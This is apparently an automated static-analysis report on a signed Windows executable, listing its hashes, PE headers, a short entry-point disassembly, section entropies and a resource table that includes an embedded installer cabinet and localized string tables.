                                                                    SHA512:ed7bbe191454c33c93c2d25120a6800d1ec7a0c3e3fa5402fd18cacd07a22752a58300043d88bb949c278480d458d035b7801151bf7d440bc956d489de118d9d
                                                                    SSDEEP:1572864:l9ZA96wMSQHS4Q8qIW0QAXNF9/EhqW/gGJ4ChinclW26OzBfuLcRk7s:l3VwMSsZqIEAhhW/WQFlW26pLO
                                                                    TLSH:2308230AA3F941D5E0FBD2788AB69517FA727C569B30D7DF0250024A1F77BA09E39321
                                                                    File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......oG..+&.J+&.J+&.J.T.K.&.J.].K8&.J.].K#&.J.].KQ&.J.O.K"&.J.O.K.&.J.T.K%&.J.T.K)&.J.T.K.&.J.T.K.&.J+&.J.$.J.].K=&.J.].K.&.J.].K*&.
                                                                    Icon Hash:173149cccc490307
                                                                    Entrypoint:0x1401eca60
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:true
                                                                    Imagebase:0x140000000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x4B1A0BE5 [Sat Dec 5 07:29:41 2009 UTC]
                                                                    TLS Callbacks:0x401ecb50, 0x1, 0x401ecbd0, 0x1
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:6
                                                                    OS Version Minor:0
                                                                    File Version Major:6
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:6
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:656a4fe4c8401782dfc51a6e6a892c98
                                                                    Signature Valid:
                                                                    Signature Issuer:
                                                                    Signature Validation Error:
                                                                    Error Number:
                                                                    Not Before, Not After
                                                                      Subject Chain
                                                                        Version:
                                                                        Thumbprint MD5:
                                                                        Thumbprint SHA-1:
                                                                        Thumbprint SHA-256:
                                                                        Serial:
                                                                        Instruction
                                                                        dec eax
                                                                        sub esp, 28h
                                                                        call 00007F999C6D12A0h
                                                                        dec eax
                                                                        add esp, 28h
                                                                        jmp 00007F999C6D05CFh
                                                                        int3
                                                                        int3
                                                                        jmp 00007F999C6CFD6Ch
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        nop word ptr [eax+eax+00000000h]
                                                                        dec eax
                                                                        sub esp, 10h
                                                                        dec esp
                                                                        mov dword ptr [esp], edx
                                                                        dec esp
                                                                        mov dword ptr [esp+08h], ebx
                                                                        dec ebp
                                                                        xor ebx, ebx
                                                                        dec esp
                                                                        lea edx, dword ptr [esp+18h]
                                                                        dec esp
                                                                        sub edx, eax
                                                                        dec ebp
                                                                        cmovb edx, ebx
                                                                        dec esp
                                                                        mov ebx, dword ptr [00000010h]
                                                                        dec ebp
                                                                        cmp edx, ebx
                                                                        jnc 00007F999C6D0768h
                                                                        inc cx
                                                                        and edx, 8D4DF000h
                                                                        wait
                                                                        add al, dh
                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x4572700x76a4.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x45e9140x230.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x4ab0000x4b26a38.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x4890000x1fce0.pdata
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x4fcd2000x2628.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x4fd20000x5a04.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x3fab400x70.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x3fac800x28.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3f82f00x140.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x34c0000x13f8.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x4570e00x60.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x34aa9c0x34ac00ee59ef6f99486c3ea80084575cc464efunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x34c0000x116dc00x116e00a1c79c3c4cc7c3ca98d5cf0b4b6cd2bbFalse0.30299876036530704data4.882706464126102IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0x4630000x2568c0x1e8006e0dd3b67e9e9c34b74b3d9e00a46f5aFalse0.18146452356557377data4.974121135133183IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .pdata0x4890000x1fce00x1fe0050252d5688451243af68d9f35e9c6ea8False0.5073912377450981data6.240040946066923IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .didat0x4a90000x480x200607562c792bb612d7fee777d7f40aa80False0.076171875data0.5703483918359332IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        _RDATA0x4aa0000x15c0x2009ae7fb2cb956117803f4c68009bd62fdFalse0.408203125data3.338152374436278IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x4ab0000x4b270000x4b26c00c79ead2eb014ad74a2054d03400c36a7unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0x4fd20000x5a040x5c00b450920460382abbade76e8025048092False0.24053158967391305data5.441652031959513IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        EDPENLIGHTENEDAPPINFOID0x4acf500x2dataEnglishUnited States5.0
                                                                        EDPPERMISSIVEAPPINFOID0x4acf540x2dataEnglishUnited States5.0
                                                                        PAYLOAD0x4acf580x4abd25cMicrosoft Cabinet archive data, many, 78359548 bytes, 1024 files, at 0x44 +A "adal.dll" +A "alertIcon.png", flags 0x4, number 1, extra bytes 20 in head, 9812 datablocks, 0x1503 compressionEnglishUnited States0.9631929397583008
                                                                        PNG0x4f6a1b40x2906PNG image data, 321 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9824795277090078
                                                                        WEVT_TEMPLATE0x4f6cabc0x21adataEnglishUnited States0.5464684014869888
                                                                        RT_ICON0x4f6ccd80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.4913294797687861
                                                                        RT_ICON0x4f6d2400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.46435018050541516
                                                                        RT_ICON0x4f6dae80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.39072494669509594
                                                                        RT_ICON0x4f6e9900x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.6214539007092199
                                                                        RT_ICON0x4f6edf80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.4298780487804878
                                                                        RT_ICON0x4f6fea00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.32863070539419087
                                                                        RT_ICON0x4f724480x7cfcPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9984998124765596
                                                                        RT_ICON0x4f7a1440x7cfcPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9984998124765596
                                                                        RT_DIALOG0x4f81e400xc8dataEnglishUnited States0.68
                                                                        RT_STRING0x4f81f080x21cMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.43333333333333335
                                                                        RT_STRING0x4f821240x266Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.4185667752442997
                                                                        RT_STRING0x4f8238c0x248Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.4212328767123288
                                                                        RT_STRING0x4f825d40x254Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.40939597315436244
                                                                        RT_STRING0x4f828280x23eMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.44947735191637633
                                                                        RT_STRING0x4f82a680x24aMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.4351535836177474
                                                                        RT_STRING0x4f82cb40x256Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.4197324414715719
                                                                        RT_STRING0x4f82f0c0x242Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.4083044982698962
                                                                        RT_STRING0x4f831500x26eMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.4533762057877814
                                                                        RT_STRING0x4f833c00x254Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.42953020134228187
                                                                        RT_STRING0x4f836140x284Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.4363354037267081
                                                                        RT_STRING0x4f838980x242Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.4463667820069204
                                                                        RT_STRING0x4f83adc0x24aMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.42662116040955633
                                                                        RT_STRING0x4f83d280x27eMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.4106583072100313
                                                                        RT_STRING0x4f83fa80x268Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.4318181818181818
                                                                        RT_STRING0x4f842100x268Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.40584415584415584
                                                                        RT_STRING0x4f844780x218Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.47761194029850745
                                                                        RT_STRING0x4f846900x29aMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.4084084084084084
                                                                        RT_STRING0x4f8492c0x260Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.4144736842105263
                                                                        RT_STRING0x4f84b8c0x24aMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.41467576791808874
                                                                        RT_STRING0x4f84dd80x250Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0CatalanSpain0.42567567567567566
                                                                        RT_STRING0x4f850280x1dcMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 0ChineseTaiwan0.4810924369747899
                                                                        RT_STRING0x4f852040x23eMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 0CzechCzech Republic0.43902439024390244
                                                                        RT_STRING0x4f854440x232Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0DanishDenmark0.39679715302491103
                                                                        RT_STRING0x4f856780x248Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0GermanGermany0.4178082191780822
                                                                        RT_STRING0x4f858c00x27cMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 0GreekGreece0.45754716981132076
                                                                        RT_STRING0x4f85b3c0x238Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0EnglishUnited States0.40669014084507044
                                                                        RT_STRING0x4f85d740x254Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0FinnishFinland0.41442953020134227
                                                                        RT_STRING0x4f85fc80x274Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0FrenchFrance0.41878980891719747
                                                                        RT_STRING0x4f8623c0x212Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0HebrewIsrael0.44150943396226416
                                                                        RT_STRING0x4f864500x22cMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 0HungarianHungary0.4172661870503597
                                                                        RT_STRING0x4f8667c0x288Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0ItalianItaly0.4058641975308642
                                                                        RT_STRING0x4f869040x1fcMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 0JapaneseJapan0.484251968503937
                                                                        RT_STRING0x4f86b000x1f8Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0KoreanNorth Korea0.503968253968254
                                                                        RT_STRING0x4f86b000x1f8Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0KoreanSouth Korea0.503968253968254
                                                                        RT_STRING0x4f86cf80x24eMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 0DutchNetherlands0.40508474576271186
                                                                        RT_STRING0x4f86f480x250Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0NorwegianNorway0.41047297297297297
                                                                        RT_STRING0x4f871980x272Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0PolishPoland0.4217252396166134
                                                                        RT_STRING0x4f8740c0x24eMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 0PortugueseBrazil0.4067796610169492
                                                                        RT_STRING0x4f8765c0x252Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0RomanianRomania0.41414141414141414
                                                                        RT_STRING0x4f878b00x270Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0RussianRussia0.42788461538461536
                                                                        RT_STRING0x4f87b200x288Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0CroatianCroatia0.41975308641975306
                                                                        RT_STRING0x4f87da80x23aMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 0SlovakSlovakia0.43157894736842106
                                                                        RT_STRING0x4f87fe40x24cMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 0SwedishSweden0.4064625850340136
                                                                        RT_STRING0x4f882300x23eMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 0ThaiThailand0.4425087108013937
                                                                        RT_STRING0x4f884700x224Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0TurkishTurkey0.4124087591240876
                                                                        RT_STRING0x4f886940x23eMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 0IndonesianIndonesia0.40069686411149824
                                                                        RT_STRING0x4f888d40x272Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0UkrainianUkrain0.43450479233226835
                                                                        RT_STRING0x4f88b480x264Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0SlovenianSlovenia0.4035947712418301
                                                                        RT_STRING0x4f88dac0x284Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0EstonianEstonia0.40993788819875776
                                                                        RT_STRING0x4f890300x248Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0LatvianLativa0.4263698630136986
                                                                        RT_STRING0x4f892780x278Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0LithuanianLithuania0.4161392405063291
                                                                        RT_STRING0x4f894f00x27cMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 0VietnameseVietnam0.42452830188679247
                                                                        RT_STRING0x4f8976c0x248Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0AzeriItaly0.4332191780821918
                                                                        RT_STRING0x4f899b40x248Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0BasqueFrance0.4092465753424658
                                                                        RT_STRING0x4f899b40x248Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0BasqueSpain0.4092465753424658
                                                                        RT_STRING0x4f89bfc0x29eMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 0SetsuanaSouth Africa0.3940298507462687
                                                                        RT_STRING0x4f89e9c0x266Matlab v4 mat-file (little endian) M, numeric, rows 0, columns 0XhosaSouth Africa0.41205211726384366
                                                                        RT_STRING0x4f8a1040x246Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0HindiIndia0.4415807560137457
                                                                        RT_STRING0x4f8a34c0x274Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0MalteseMalta0.4124203821656051
                                                                        RT_STRING0x4f8a5c00x28aMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 0MalayMalaysia0.38769230769230767
                                                                        RT_STRING0x4f8a84c0x256Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0BengaliIndia0.46321070234113715
                                                                        RT_STRING0x4f8aaa40x254Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0GujaratiIndia0.46476510067114096
                                                                        RT_STRING0x4f8acf80x284Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0OriyaIndia0.4394409937888199
                                                                        RT_STRING0x4f8af7c0x274Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0TamilIndia0.445859872611465
                                                                        RT_STRING0x4f8af7c0x274Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0TamilSri Lanka0.445859872611465
                                                                        RT_STRING0x4f8b1f00x240Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0TeluguIndia0.4375
                                                                        RT_STRING0x4f8b4300x258Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0KannadaKanada0.47
                                                                        RT_STRING0x4f8b6880x286Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0MalayalamIndia0.42260061919504643
                                                                        RT_STRING0x4f8b9100x262Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0AssameseIndia0.47704918032786886
                                                                        RT_STRING0x4f8bb740x24eMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 0MarathiIndia0.4288135593220339
                                                                        RT_STRING0x4f8bdc40x25eMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 0WelshEngland0.41254125412541254
                                                                        RT_STRING0x4f8c0240x25aMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 0KhmerVietnam0.48172757475083056
                                                                        RT_STRING0x4f8c0240x25aMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 0KhmerThailand0.48172757475083056
                                                                        RT_STRING0x4f8c2800x230Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0AmharicEthiopia0.46785714285714286
                                                                        RT_STRING0x4f8c4b00x252Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0NepaliNepal0.4377104377104377
                                                                        RT_STRING0x4f8c7040x24eMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 0FilipinoPhilippines0.4016949152542373
                                                                        RT_STRING0x4f8c9540x250Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.44256756756756754
                                                                        RT_STRING0x4f8cba40x250Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.4172297297297297
                                                                        RT_STRING0x4f8cdf40x236Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0IgboNigeria0.4293286219081272
                                                                        RT_STRING0x4f8d02c0x240Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0MaoriNew Zealand0.3993055555555556
                                                                        RT_STRING0x4f8d26c0x258Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.42333333333333334
                                                                        RT_STRING0x4f8d4c40x1d8Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0ChineseChina0.4788135593220339
                                                                        RT_STRING0x4f8d69c0x238Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0EnglishGreat Britain0.40669014084507044
                                                                        RT_STRING0x4f8d8d40x24eMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 0NorwegianNorway0.411864406779661
                                                                        RT_STRING0x4f8db240x282Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0PortuguesePortugal0.40965732087227413
                                                                        RT_STRING0x4f8dda80x26eMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 0GaelicIreland0.41639871382636656
                                                                        RT_STRING0x4f8e0180x284Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.40993788819875776
                                                                        RT_STRING0x4f8e29c0x244Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.40344827586206894
                                                                        RT_STRING0x4f8e4e00x266Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0BosnianBosnian0.41368078175895767
                                                                        RT_STRING0x4f8e7480x268Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.42857142857142855
                                                                        RT_STRING0x4f8e9b00x25aMatlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.4152823920265781
                                                                        RT_STRING0x4f8ec0c0x258Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.4266666666666667
                                                                        RT_STRING0x4f8ee640x238Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 00.45422535211267606
                                                                        RT_STRING0x4f8f09c0x6f0data0.30743243243243246
                                                                        RT_STRING0x4f8f78c0x842data0.2861873226111637
                                                                        RT_STRING0x4f8ffd00x78edata0.297311271975181
                                                                        RT_STRING0x4f907600x7dedata0.27805362462760674
                                                                        RT_STRING0x4f90f400x870data0.3013888888888889
                                                                        RT_STRING0x4f917b00x82adata0.3004784688995215
                                                                        RT_STRING0x4f91fdc0x8c8data0.26201067615658363
                                                                        RT_STRING0x4f928a40x8a2data0.25927601809954753
                                                                        RT_STRING0x4f931480x8ecdata0.28984238178633975
                                                                        RT_STRING0x4f93a340x896data0.2857142857142857
                                                                        RT_STRING0x4f942cc0x7c2data0.30614300100704933
                                                                        RT_STRING0x4f94a900x784data0.3264033264033264
                                                                        RT_STRING0x4f952140x818data0.2905405405405405
                                                                        RT_STRING0x4f95a2c0x7b8data0.2768218623481781
                                                                        RT_STRING0x4f961e40x842data0.2899716177861873
                                                                        RT_STRING0x4f96a280x8c4data0.24866310160427807
                                                                        RT_STRING0x4f972ec0x608data0.37823834196891193
                                                                        RT_STRING0x4f978f40x970data0.2582781456953642
                                                                        RT_STRING0x4f982640x81adata0.2772420443587271
                                                                        RT_STRING0x4f98a800x6baAmigaOS bitmap font "a", fc_YSize 25856, 21248 elements, 2nd "b", 3rd "g"0.3118466898954704
                                                                        RT_STRING0x4f9913c0x84adataCatalanSpain0.28039585296889724
                                                                        RT_STRING0x4f999880x380dataChineseTaiwan0.48214285714285715
                                                                        RT_STRING0x4f99d080x7d8dataCzechCzech Republic0.3057768924302789
                                                                        RT_STRING0x4f9a4e00x796dataDanishDenmark0.27909371781668385
                                                                        RT_STRING0x4f9ac780x992dataGermanGermany0.2624489795918367
                                                                        RT_STRING0x4f9b60c0xa1adataGreekGreece0.2819025522041763
                                                                        RT_STRING0x4f9c0280x7e2dataEnglishUnited States0.26858275520317143
                                                                        RT_STRING0x4f9c80c0x81cdataFinnishFinland0.2866088631984586
                                                                        RT_STRING0x4f9d0280x87edataFrenchFrance0.265869365225391
                                                                        RT_STRING0x4f9d8a80x656dataHebrewIsrael0.31442663378545005
                                                                        RT_STRING0x4f9df000x834dataHungarianHungary0.29619047619047617
                                                                        RT_STRING0x4f9e7340x81cdataItalianItaly0.26734104046242774
                                                                        RT_STRING0x4f9ef500x570dataJapaneseJapan0.39080459770114945
                                                                        RT_STRING0x4f9f4c00x4b6dataKoreanNorth Korea0.4129353233830846
                                                                        RT_STRING0x4f9f4c00x4b6dataKoreanSouth Korea0.4129353233830846
                                                                        RT_STRING0x4f9f9780x84edataDutchNetherlands0.2704609595484478
                                                                        RT_STRING0x4fa01c80x7b8dataNorwegianNorway0.27479757085020245
                                                                        RT_STRING0x4fa09800x89adataPolishPoland0.2811080835603996
                                                                        RT_STRING0x4fa121c0x862dataPortugueseBrazil0.26887232059645855
                                                                        RT_STRING0x4fa1a800x848dataRomanianRomania0.2759433962264151
                                                                        RT_STRING0x4fa22c80x7badataRussianRussia0.3068756319514661
                                                                        RT_STRING0x4fa2a840x810dataCroatianCroatia0.2771317829457364
                                                                        RT_STRING0x4fa32940x7f0dataSlovakSlovakia0.30118110236220474
                                                                        RT_STRING0x4fa3a840x78cdataSwedishSweden0.2727743271221532
                                                                        RT_STRING0x4fa42100x712dataThaiThailand0.30994475138121547
                                                                        RT_STRING0x4fa49240x77cdataTurkishTurkey0.2954070981210856
                                                                        RT_STRING0x4fa50a00x73cdataIndonesianIndonesia0.2737580993520518
                                                                        RT_STRING0x4fa57dc0x842dataUkrainianUkrain0.30416272469252603
                                                                        RT_STRING0x4fa60200x8dcdataSlovenianSlovenia0.2724867724867725
                                                                        RT_STRING0x4fa68fc0x7cedataEstonianEstonia0.2877877877877878
                                                                        RT_STRING0x4fa70cc0x7d8dataLatvianLativa0.28336653386454186
                                                                        RT_STRING0x4fa78a40x786dataLithuanianLithuania0.3011422637590862
                                                                        RT_STRING0x4fa802c0x7c6dataVietnameseVietnam0.30954773869346736
                                                                        RT_STRING0x4fa87f40x8a0dataAzeriItaly0.28125
                                                                        RT_STRING0x4fa90940x768dataBasqueFrance0.2732067510548523
                                                                        RT_STRING0x4fa90940x768dataBasqueSpain0.2732067510548523
                                                                        RT_STRING0x4fa97fc0x8a8dataSetsuanaSouth Africa0.25406137184115524
                                                                        RT_STRING0x4faa0a40x870dataXhosaSouth Africa0.2740740740740741
                                                                        RT_STRING0x4faa9140x864dataHindiIndia0.29702048417132215
                                                                        RT_STRING0x4fab1780x830dataMalteseMalta0.27719465648854963
                                                                        RT_STRING0x4fab9a80x902dataMalayMalaysia0.2588898525585429
                                                                        RT_STRING0x4fac2ac0x836dataBengaliIndia0.31303520456707895
                                                                        RT_STRING0x4facae40x84edataGujaratiIndia0.3019755409219191
                                                                        RT_STRING0x4fad3340x882dataOriyaIndia0.29292929292929293
                                                                        RT_STRING0x4fadbb80x962dataTamilIndia0.2656119900083264
                                                                        RT_STRING0x4fadbb80x962dataTamilSri Lanka0.2656119900083264
                                                                        RT_STRING0x4fae51c0x86cdataTeluguIndia0.29916512059369205
                                                                        RT_STRING0x4faed880x87adataKannadaKanada0.2894009216589862
                                                                        RT_STRING0x4faf6040x94adataMalayalamIndia0.2767031118587048
                                                                        RT_STRING0x4faff500x8acdataAssameseIndia0.29954954954954954
                                                                        RT_STRING0x4fb07fc0x85adataMarathiIndia0.2970065481758653
                                                                        RT_STRING0x4fb10580x87cdataWelshEngland0.27992633517495397
                                                                        RT_STRING0x4fb18d40x7a4dataKhmerVietnam0.3338445807770961
                                                                        RT_STRING0x4fb18d40x7a4dataKhmerThailand0.3338445807770961
                                                                        RT_STRING0x4fb20780x5badataAmharicEthiopia0.3813096862210095
                                                                        RT_STRING0x4fb26340x852dataNepaliNepal0.28826291079812205
                                                                        RT_STRING0x4fb2e880x8a4dataFilipinoPhilippines0.26582278481012656
                                                                        RT_STRING0x4fb372c0x7c6data0.31256281407035175
                                                                        RT_STRING0x4fb3ef40x8eadata0.27256792287467135
                                                                        RT_STRING0x4fb47e00x732dataIgboNigeria0.2969598262757872
                                                                        RT_STRING0x4fb4f140x774dataMaoriNew Zealand0.259958071278826
                                                                        RT_STRING0x4fb56880x854data0.28095684803001875
                                                                        RT_STRING0x4fb5edc0x376dataChineseChina0.48419864559819414
                                                                        RT_STRING0x4fb62540x7e2dataEnglishGreat Britain0.26858275520317143
                                                                        RT_STRING0x4fb6a380x804dataNorwegianNorway0.2699805068226121
                                                                        RT_STRING0x4fb723c0x82adataPortuguesePortugal0.26220095693779905
                                                                        RT_STRING0x4fb7a680x936dataGaelicIreland0.2553011026293469
                                                                        RT_STRING0x4fb83a00x85cdata0.2672897196261682
                                                                        RT_STRING0x4fb8bfc0x774data0.269916142557652
                                                                        RT_STRING0x4fb93700x896dataBosnianBosnian0.27388535031847133
                                                                        RT_STRING0x4fb9c080x8a2data0.2828054298642534
                                                                        RT_STRING0x4fba4ac0x7eedata0.2738916256157635
                                                                        RT_STRING0x4fbac9c0x7ecdata0.2859960552268245
                                                                        RT_STRING0x4fbb4880x7badata0.31648129423660265
                                                                        RT_STRING0x4fbbc440x372data0.4308390022675737
                                                                        RT_STRING0x4fbbfb80x442data0.39541284403669724
                                                                        RT_STRING0x4fbc3fc0x3fcdata0.3931372549019608
                                                                        RT_STRING0x4fbc7f80x43edata0.3720073664825046
                                                                        RT_STRING0x4fbcc380x41cdata0.4268060836501901
                                                                        RT_STRING0x4fbd0540x40edata0.4046242774566474
                                                                        RT_STRING0x4fbd4640x426data0.3860640301318267
                                                                        RT_STRING0x4fbd88c0x434data0.36059479553903345
                                                                        RT_STRING0x4fbdcc00x44cdata0.4072727272727273
                                                                        RT_STRING0x4fbe10c0x49edata0.4120135363790186
                                                                        RT_STRING0x4fbe5ac0x3d4data0.41836734693877553
                                                                        RT_STRING0x4fbe9800x472data0.4112478031634446
                                                                        RT_STRING0x4fbedf40x360data0.44560185185185186
                                                                        RT_STRING0x4fbf1540x406data0.3699029126213592
                                                                        RT_STRING0x4fbf55c0x49adata0.3938879456706282
                                                                        RT_STRING0x4fbf9f80xf2data0.5247933884297521
                                                                        RT_STRING0x4fbfaec0xe2data0.5707964601769911
                                                                        RT_STRING0x4fbfbd00xf2data0.5289256198347108
                                                                        RT_STRING0x4fbfcc40x106data0.5229007633587787
                                                                        RT_STRING0x4fbfdcc0xecdata0.5296610169491526
                                                                        RT_STRING0x4fbfeb80x3fcdataCatalanSpain0.35784313725490197
                                                                        RT_STRING0x4fc02b40x234dataChineseTaiwan0.5939716312056738
                                                                        RT_STRING0x4fc04e80x420dataCzechCzech Republic0.4053030303030303
                                                                        RT_STRING0x4fc09080x444dataDanishDenmark0.36355311355311354
                                                                        RT_STRING0x4fc0d4c0x494dataGermanGermany0.34897610921501704
                                                                        RT_STRING0x4fc11e00x49adataGreekGreece0.39813242784380304
                                                                        RT_STRING0x4fc167c0x402dataEnglishUnited States0.37816764132553604
                                                                        RT_STRING0x4fc1a800x3c0dataFinnishFinland0.38645833333333335
